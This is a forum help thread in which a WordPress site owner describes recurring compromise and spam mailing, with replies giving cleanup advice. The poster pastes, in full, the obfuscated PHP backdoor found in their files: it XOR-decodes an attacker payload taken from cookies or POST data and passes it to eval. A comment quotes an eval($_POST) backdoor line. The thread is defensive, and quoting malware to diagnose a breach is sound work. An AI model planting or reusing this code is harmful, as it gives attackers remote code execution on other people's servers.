# WordPress website hacked, I tried everything

Tags: php, wordpress

Since a few weeks, my WordPress website gets hacked. Randomly, the hackers modify the contents of certain files to include malicious code that sends TENS of thousands of spam e-mails.

I have tried everything, including:

- updating WordPress
- updating all the plugins
- updating all the external plugins (Revolution Slider, Visual Composer, etc etc)
- Removed all the default themes and plugins such as Twenty Sixteen, Akismet, etc, just to make sure they dont' have any malicious code

I have installed WordFence and enabled full protection on the two installations that get hacked. It notifies me whenever malicious code appears, but I can't find the source of the problem. Everytime I fix the issue, after a few days the code appears in other files.

Also important is that the files  that are modified don't have the "Last modified" modified. So they somehow modify the files without altering the "Last modified" datestamp.

Also note that the files are not modified via FTP or any other method as there are no logins to either FTP/cPanel/ssh from anyone else besides me.

The malicious code is

```
    $g1057 = 482;$GLOBALS['w2625f542']=Array();global$w2625f542;$w2625f542=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['pda9466']="\x4b\x2f\x35\x69\x31\x4c\x66\x60\x7e\x6a\x25\x7d\x27\x7c\x58\x57\x5a\x4a\x7b\x4d\x5d\x2d\x77\x43\x2a\x6b\x2b\x64\x42\x75\x20\x46\x2e\x49\x29\x44\x3c\x54\x68\x45\x5b\x50\x24\xa\x48\x5f\x28\x2c\xd\x70\x56\x22\x3a\x5e\x52\x38\x23\x6c\x33\x62\x39\x6f\x34\x41\x79\x53\x36\x3b\x3f\x67\x3e\x73\x55\x21\x76\x63\x3d\x4e\x37\x9\x4f\x74\x6d\x26\x32\x7a\x51\x30\x47\x78\x61\x72\x40\x65\x71\x59\x5c\x6e";$w2625f542[$w2625f542['pda9466'][71].$w2625f542['pda9466'][93].$w2625f542['pda9466'][55].$w2625f542['pda9466'][62].$w2625f542['pda9466'][59].$w2625f542['pda9466'][90]]=$w2625f542['pda9466'][75].$w2625f542['pda9466'][38].$w2625f542['pda9466'][91];$w2625f542[$w2625f542['pda9466'][71].$w2625f542['pda9466'][27].$w2625f542['pda9466'][58].$w2625f542['pda9466'][2].$w2625f542['pda9466'][62].$w2625f542['pda9466'][84].$w2625f542['pda9466'][93].$w2625f542['pda9466'][60]]=$w2625f542['pda9466'][61].$w2625f542['pda9466'][91].$w2625f542['pda9466'][27];$w2625f542[$w2625f542['pda9466'][69].$w2625f542['pda9466'][2].$w2625f542['pda9466'][75].$w2625f542['pda9466'][2].$w2625f542['pda9466'][4].$w2625f542['pda9466'][6].$w2625f542['pda9466'][27].$w2625f542['pda9466'][62]]=$w2625f542['pda9466'][71].$w2625f542['pda9466'][81].$w2625f542['pda9466'][91].$w2625f542['pda9466'][57].$w2625f542['pda9466'][93].$w2625f542['pda9466'][97];$w2625f542[$w2625f542['pda9466'][22].$w2625f542['pda9466'][87].$w2625f542['pda9466'][84].$w2625f542['pda9466'][66].$w2625f542['pda9466'][84].$w2625f542['pda9466'][59].$w2625f542['pda9466'][62].$w2625f542['pda9466'][60]]=$w2625f542['pda9466'][3].$w2625f542['pda9466'][97].$w2625f542['pda9466'][3].$w2625f542['pda9466'][45].$w2625f542['pda9466'][71].$w2625f542['pda9466'][93].$w2625f542['pda9466'][81];$w2625f542[$w2625f542['pda9466'][74].$w2625f542['pda9466'][87].$w2625f542['pda9466'][4].$w2625f542['pda9466'][87].$w2625f542['pda9466'][58]]=$w2625f542['pda9466'][71].$w2625f542['pda9466'][93].$w2625f542['pda9466'][91].$w2625f542['pda9466'][3].$w2625f542['pda9466'][90].$w2625f542['pda9466'][57].$w2625f542['pda9466'][3].$w2625f542['pda9466'][85].$w2625f542['pda9466'][93];$w2625f542[$w2625f542['pda9466'][75].$w2625f542['pda9466'][87].$w2625f542['pda9466'][60].$w2625f542['pda9466'][90].$w2625f542['pda9466'][6].$w2625f542['pda9466'][90].$w2625f542['pda9466'][27].$w2625f542['pda9466'][6].$w2625f542['pda9466'][55]]=$w2625f542['pda9466'][49].$w2625f542['pda9466'][38].$w2625f542['pda9466'][49].$w2625f542['pda9466'][74].$w2625f542['pda9466'][93].$w2625f542['pda9466'][91].$w2625f542['pda9466'][71].$w2625f542['pda9466'][3].$w2625f542['pda9466'][61].$w2625f542['pda9466'][97];$w2625f542[$w2625f542['pda9466'][29].$w2625f542['pda9466'][59].$w2625f542['pda9466'][59].$w2625f542['pda9466'][4].$w2625f542['pda9466'][66].$w2625f542['pda9466'][75].$w2625f542['pda9466'][27]]=$w2625f542['pda9466'][29].$w2625f542['pda9466'][97].$w2625f542['pda9466'][71].$w2625f542['pda9466'][93].$w2625f542['pda9466'][91].$w2625f542['pda9466'][3].$w2625f542['pda9466'][90].$w2625f542['pda9466'][57].$w2625f542['pda9466'][3].$w2625f542['pda9466'][85].$w2625f542['pda9466'][93];$w2625f542[$w2625f542['pda9466'][6].$w2625f542['pda9466'][87].$w2625f542['pda9466'][27].$w2625f542['pda9466'][78].$w2625f542['pda9466'][93].$w2625f542['pda9466'][55].$w2625f542['pda9466'][66].$w2625f542['pda9466'][75]]=$w2625f542['pda9466'][59].$w2625f542['pda9466'][90].$w2625f542['pda9466'][71].$w2625f542['pda9466'][93].$w2625f542['pda9466'][66].$w2625f542['pda9466'][62].$w2625f542['pda9466'][45].$w2625f542['pda9466'][27].$w2625f542['pda9466'][93].$w2625f542['pda9466'][75].$w2625f542['pda9466'][61].$w2625f542['pda9466'][27].$w2625f542['pda9466'][93];$w2625f542[$w2625f542['pda9466'][81].$w2625f542['pda9466'][6].$w2625f542['pda9466'][55].$w2625f542['pda9466'][93].$w2625f542['pda9466'][60].$w2625f542['pda9466'][4]]=$w2625f542['pda9466'][71].$w2625f542['pda9466'][93].$w2625f542['pda9466'][81].$w2625f542['pda9466'][45].$w2625f542['pda9466'][81].$w2625f542['pda9466'][3].$w2625f542['pda9466'][82].$w2625f542['pda9466'][93].$w2625f542['pda9466'][45].$w2625f542['pda9466'][57].$w2625f542['pda9466'][3].$w2625f542['pda9466'][82].$w2625f542['pda9466'][3].$w2625f542['pda9466'][81];$w2625f542[$w2625f542['pda9466'][71].$w2625f542['pda9466'][6].$w2625f542['pda9466'][6].$w2625f542['pda9466'][2].$w2625f542['pda9466'][93].$w2625f542['pda9466'][60]]=$w2625f542['pda9466'][90].$w2625f542['pda9466'][59].$w2625f542['pda9466'][27].$w2625f542['pda9466'][62];$w2625f542[$w2625f542['pda9466'][9].$w2625f542['pda9466'][93].$w2625f542['pda9466'][2].$w2625f542['pda9466'][59].$w2625f542['pda9466'][59].$w2625f542['pda9466'][62].$w2625f542['pda9466'][27].$w2625f542['pda9466'][59]]=$w2625f542['pda9466'][27].$w2625f542['pda9466'][4].$w2625f542['pda9466'][78].$w2625f542['pda9466'][2].$w2625f542['pda9466'][55].$w2625f542['pda9466'][84].$w2625f542['pda9466'][27];$w2625f542[$w2625f542['pda9466'][97].$w2625f542['pda9466'][90].$w2625f542['pda9466'][66].$w2625f542['pda9466'][84].$w2625f542['pda9466'][90]]=$_POST;$w2625f542[$w2625f542['pda9466'][25].$w2625f542['pda9466'][75].$w2625f542['pda9466'][90].$w2625f542['pda9466'][66].$w2625f542['pda9466'][62].$w2625f542['pda9466'][87].$w2625f542['pda9466'][2]]=$_COOKIE;@$w2625f542[$w2625f542['pda9466'][22].$w2625f542['pda9466'][87].$w2625f542['pda9466'][84].$w2625f542['pda9466'][66].$w2625f542['pda9466'][84].$w2625f542['pda9466'][59].$w2625f542['pda9466'][62].$w2625f542['pda9466'][60]]($w2625f542['pda9466'][93].$w2625f542['pda9466'][91].$w2625f542['pda9466'][91].$w2625f542['pda9466'][61].$w2625f542['pda9466'][91].$w2625f542['pda9466'][45].$w2625f542['pda9466'][57].$w2625f542['pda9466'][61].$w2625f542['pda9466'][69],NULL);@$w2625f542[$w2625f542['pda9466'][22].$w2625f542['pda9466'][87].$w2625f542['pda9466'][84].$w2625f542['pda9466'][66].$w2625f542['pda9466'][84].$w2625f542['pda9466'][59].$w2625f542['pda9466'][62].$w2625f542['pda9466'][60]]($w2625f542['pda9466'][57].$w2625f542['pda9466'][61].$w2625f542['pda9466'][69].$w2625f542['pda9466'][45].$w2625f542['pda9466'][93].$w2625f542['pda9466'][91].$w2625f542['pda9466'][91].$w2625f542['pda9466'][61].$w2625f542['pda9466'][91].$w2625f542['pda9466'][71],0);@$w2625f542[$w2625f542['pda9466'][22].$w2625f542['pda9466'][87].$w2625f542['pda9466'][84].$w2625f542['pda9466'][66].$w2625f542['pda9466'][84].$w2625f542['pda9466'][59].$w2625f542['pda9466'][62].$w2625f542['pda9466'][60]]($w2625f542['pda9466'][82].$w2625f542['pda9466'][90].$w2625f542['pda9466'][89].$w2625f542['pda9466'][45].$w2625f542['pda9466'][93].$w2625f542['pda9466'][89].$w2625f542['pda9466'][93].$w2625f542['pda9466'][75].$w2625f542['pda9466'][29].$w2625f542['pda9466'][81].$w2625f542['pda9466'][3].$w2625f542['pda9466'][61].$w2625f542['pda9466'][97].$w2625f542['pda9466'][45].$w2625f542['pda9466'][81].$w2625f542['pda9466'][3].$w2625f542['pda9466'][82].$w2625f542['pda9466'][93],0);@$w2625f542[$w2625f542['pda9466'][81].$w2625f542['pda9466'][6].$w2625f542['pda9466'][55].$w2625f542['pda9466'][93].$w2625f542['pda9466'][60].$w2625f542['pda9466'][4]](0);$reb1=NULL;$lc4d63=NULL;$w2625f542[$w2625f542['pda9466'][94].$w2625f542['pda9466'][60].$w2625f542['pda9466'][87].$w2625f542['pda9466'][93]]=$w2625f542['pda9466'][4].$w2625f542['pda9466'][58].$w2625f542['pda9466'][62].$w2625f542['pda9466'][84].$w2625f542['pda9466'][4].$w2625f542['pda9466'][4].$w2625f542['pda9466'][6].$w2625f542['pda9466'][55].$w2625f542['pda9466'][21].$w2625f542['pda9466'][62].$w2625f542['pda9466'][4].$w2625f542['pda9466'][75].$w2625f542['pda9466'][58].$w2625f542['pda9466'][21].$w2625f542['pda9466'][62].$w2625f542['pda9466'][27].$w2625f542['pda9466'][27].$w2625f542['pda9466'][66].$w2625f542['pda9466'][21].$w2625f542['pda9466'][55].$w2625f542['pda9466'][78].$w2625f542['pda9466'][59].$w2625f542['pda9466'][90].$w2625f542['pda9466'][21].$w2625f542['pda9466'][93].$w2625f542['pda9466'][78].$w2625f542['pda9466'][62].$w2625f542['pda9466'][62].$w2625f542['pda9466'][66].$w2625f542['pda9466'][4].$w2625f542['pda9466'][75].$w2625f542['pda9466'][90].$w2625f542['pda9466'][66].$w2625f542['pda9466'][90].$w2625f542['pda9466'][55].$w2625f542['pda9466'][27];global$q90e;function d17582d($reb1,$iba462){global$w2625f542;$r88a55e="";for($g25e=0;$g25e<$w2625f542[$w2625f542['pda9466'][69].$w2625f542['pda9466'][2].$w2625f542['pda9466'][75].$w2625f542['pda9466'][2].$w2625f542['pda9466'][4].$w2625f542['pda9466'][6].$w2625f542['pda9466'][27].$w2625f542['pda9466'][62]]($reb1);){for($u18699a=0;$u18699a<$w2625f542[$w2625f542['pda9466'][69].$w2625f542['pda9466'][2].$w2625f542['pda9466'][75].$w2625f542['pda9466'][2].$w2625f542['pda9466'][4].$w2625f542['pda9466'][6].$w2625f542['pda9466'][27].$w2625f542['pda9466'][62]]($iba462)&&$g25e<$w2625f542[$w2625f542['pda9466'][69].$w2625f542['pda9466'][2].$w2625f542['pda9466'][75].$w2625f542['pda9466'][2].$w2625f542['pda9466'][4].$w2625f542['pda9466'][6].$w2625f542['pda9466'][27].$w2625f542['pda9466'][62]]($reb1);$u18699a++,$g25e++){$r88a55e.=$w2625f542[$w2625f542['pda9466'][71].$w2625f542['pda9466'][93].$w2625f542['pda9466'][55].$w2625f542['pda9466'][62].$w2625f542['pda9466'][59].$w2625f542['pda9466'][90]]($w2625f542[$w2625f542['pda9466'][71].$w2625f542['pda9466'][27].$w2625f542['pda9466'][58].$w2625f542['pda9466'][2].$w2625f542['pda9466'][62].$w2625f542['pda9466'][84].$w2625f542['pda9466'][93].$w2625f542['pda9466'][60]]($reb1[$g25e])^$w2625f542[$w2625f542['pda9466'][71].$w2625f542['pda9466'][27].$w2625f542['pda9466'][58].$w2625f542['pda9466'][2].$w2625f542['pda9466'][62].$w2625f542['pda9466'][84].$w2625f542['pda9466'][93].$w2625f542['pda9466'][60]]($iba462[$u18699a]));}}return$r88a55e;}function abd4($reb1,$iba462){global$w2625f542;global$q90e;return$w2625f542[$w2625f542['pda9466'][9].$w2625f542['pda9466'][93].$w2625f542['pda9466'][2].$w2625f542['pda9466'][59].$w2625f542['pda9466'][59].$w2625f542['pda9466'][62].$w2625f542['pda9466'][27].$w2625f542['pda9466'][59]]($w2625f542[$w2625f542['pda9466'][9].$w2625f542['pda9466'][93].$w2625f542['pda9466'][2].$w2625f542['pda9466'][59].$w2625f542['pda9466'][59].$w2625f542['pda9466'][62].$w2625f542['pda9466'][27].$w2625f542['pda9466'][59]]($reb1,$q90e),$iba462);}foreach($w2625f542[$w2625f542['pda9466'][25].$w2625f542['pda9466'][75].$w2625f542['pda9466'][90].$w2625f542['pda9466'][66].$w2625f542['pda9466'][62].$w2625f542['pda9466'][87].$w2625f542['pda9466'][2]]as$iba462=>$a7d8){$reb1=$a7d8;$lc4d63=$iba462;}if(!$reb1){foreach($w2625f542[$w2625f542['pda9466'][97].$w2625f542['pda9466'][90].$w2625f542['pda9466'][66].$w2625f542['pda9466'][84].$w2625f542['pda9466'][90]]as$iba462=>$a7d8){$reb1=$a7d8;$lc4d63=$iba462;}}$reb1=@$w2625f542[$w2625f542['pda9466'][29].$w2625f542['pda9466'][59].$w2625f542['pda9466'][59].$w2625f542['pda9466'][4].$w2625f542['pda9466'][66].$w2625f542['pda9466'][75].$w2625f542['pda9466'][27]]($w2625f542[$w2625f542['pda9466'][71].$w2625f542['pda9466'][6].$w2625f542['pda9466'][6].$w2625f542['pda9466'][2].$w2625f542['pda9466'][93].$w2625f542['pda9466'][60]]($w2625f542[$w2625f542['pda9466'][6].$w2625f542['pda9466'][87].$w2625f542['pda9466'][27].$w2625f542['pda9466'][78].$w2625f542['pda9466'][93].$w2625f542['pda9466'][55].$w2625f542['pda9466'][66].$w2625f542['pda9466'][75]]($reb1),$lc4d63));if(isset($reb1[$w2625f542['pda9466'][90].$w2625f542['pda9466'][25]])&&$q90e==$reb1[$w2625f542['pda9466'][90].$w2625f542['pda9466'][25]]){if($reb1[$w2625f542['pda9466'][90]]==$w2625f542['pda9466'][3]){$g25e=Array($w2625f542['pda9466'][49].$w2625f542['pda9466'][74]=>@$w2625f542[$w2625f542['pda9466'][75].$w2625f542['pda9466'][87].$w2625f542['pda9466'][60].$w2625f542['pda9466'][90].$w2625f542['pda9466'][6].$w2625f542['pda9466'][90].$w2625f542['pda9466'][27].$w2625f542['pda9466'][6].$w2625f542['pda9466'][55]](),$w2625f542['pda9466'][71].$w2625f542['pda9466'][74]=>$w2625f542['pda9466'][4].$w2625f542['pda9466'][32].$w2625f542['pda9466'][87].$w2625f542['pda9466'][21].$w2625f542['pda9466'][4],);echo@$w2625f542[$w2625f542['pda9466'][74].$w2625f542['pda9466'][87].$w2625f542['pda9466'][4].$w2625f542['pda9466'][87].$w2625f542['pda9466'][58]]($g25e);}elseif($reb1[$w2625f542['pda9466'][90]]==$w2625f542['pda9466'][93]){eval/*g42a*/($reb1[$w2625f542['pda9466'][27]]);}exit();} ?>
```

Comment: It is very difficult to delete such a hack. You can't be sure you don't miss a piece of code. I also got hacked, and found that a plugin was installed (which I hadn't installed myself) which name was "security something" (can't remember), so give it a check, where I found a code "eval($_POST["xxx"])"... But I had to save my theme/database data, and import it in a new fresh wordpress install...

Comment: Do you see random users trying to access your website (thanks to wordfence) ? Websites are permanently attacked. Here you know there is a security issue in your wordpress, so if you don't correct it, the hacker will still use this same rift to alter your wordpress... and thanks to Wordence, you may see the URL used by hackers to try to hack it (it has to be a POST... you won't find many of these requests...)

Comment: Yes, but they all have "subscriber" access, not admin or anything else. And I have sites where users can register and login.

Comment: You should first try to find "POST" requests to your website, to identify where the hacker comes from... (using wordfence or apache/nginx of your server)

Comment: updating an infected system won't help at all - first, block all external access. then **roll back** to the last version that was clean. *then* update everything, change *all* your passwords, inform your users, etc.

Comment: Unfortunately I don't have any clean version, as I discovered that I was hacked months after, when I got blacklisted by google.

Comment: So you have no choice but do what I mentionned: Reinstall a new fresh wordpress, or track any POST request, check on google how to avoid the security issue on the URL you found, clean corrupted files thanks to wordfence, change passwords, and pray you didn't miss any file...

Comment: @CristiMacovei **always** have a backup. that's basically IT rule #1. *no backup, no mercy.*

Comment: I have backups but I have no idea when the website was clean. They did nothing to the website, but put a few files to send spam e-mails. The websites are all intact.

Comment: If you have backups, you may use files comparators between each backup, and check which files should not have been modified to find the corrupted one...